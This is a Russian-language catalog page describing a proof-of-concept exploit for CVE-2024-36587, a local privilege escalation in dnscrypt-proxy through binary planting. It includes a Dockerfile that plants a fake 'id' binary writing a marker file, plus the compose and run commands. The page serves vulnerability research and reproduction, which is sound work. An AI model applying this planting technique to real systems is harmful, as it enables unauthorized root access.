Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-36587 — Эксплойт PoC для CVE-2024-36587, демонстрирующий локальное повышение привилегий в dnscrypt-proxy через бинарную подмену, со средой воспроизведения на основе Docker. | Kitploit
Инструменты/GitHubGitHub/meeeeing/cve-2024-36587
Повышение привилегийБезопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubmeeeeing/cve-2024-36587

CVE-2024-36587

Эксплойт PoC для CVE-2024-36587, демонстрирующий локальное повышение привилегий в dnscrypt-proxy через бинарную подмену, со средой воспроизведения на основе Docker.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-36587 - dnscrypt-proxy Local Privilege Escalation

Обзор

  • Описание уязвимости: Из-за проблемы, при которой при установке службы dnscrypt-proxy доверяется исполняемым файлам в текущем каталоге и регистрирует их, возможно повышение привилегий путем внедрения вредоносного бинарного файла.
  • Уязвимые версии: dnscrypt-proxy v2.0.0-alpha9 ~ v2.1.5
  • Метод PoC: Подмена бинарного файла (binary planting)

Настройка окружения

root@kitploit:~
docker compose up --build

После сборки и запуска создается контейнер.

Доступ внутрь контейнера:

root@kitploit:~
docker run -it --privileged dnscrypt-poc-poc bash

Запуск уязвимости

Внутри контейнера:

root@kitploit:~
/tmp/id
cat /tmp/poc_was_here

Если выводится Pwned_from_Docker, PoC успешен.

Файлы конфигурации

Dockerfile

root@kitploit:~
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y \
    git \
    golang-go \
    sudo

WORKDIR /workspace

RUN git clone https://github.com/DNSCrypt/dnscrypt-proxy.git && \
    cd dnscrypt-proxy && \
    git checkout tags/2.1.0 && \
    go build -o proxy ./dnscrypt-proxy

RUN bash -c 'echo -e "#!/bin/bash\necho Pwned_from_Docker > /tmp/poc_was_here" > /tmp/id' && \
    chmod +x /tmp/id && \
    ln -sf /tmp/id /usr/local/bin/id

CMD ["./dnscrypt-proxy/proxy", "-service", "install"]

docker-compose.yaml

root@kitploit:~
version: "3.8"

services:
  poc:
    build: .
    container_name: dnscrypt-poc
    privileged: true
    tty: true

Ссылки

  • https://github.com/DNSCrypt/dnscrypt-proxy
  • https://nvd.nist.gov/vuln/detail/CVE-2024-36587

Скриншот результатов

docker build success

Подробный отчет

Более подробный анализ и результаты практического выполнения см. в следующем PDF-документе:

PoC_Report_CVE-2024-36587.pdf

Скачать инструмент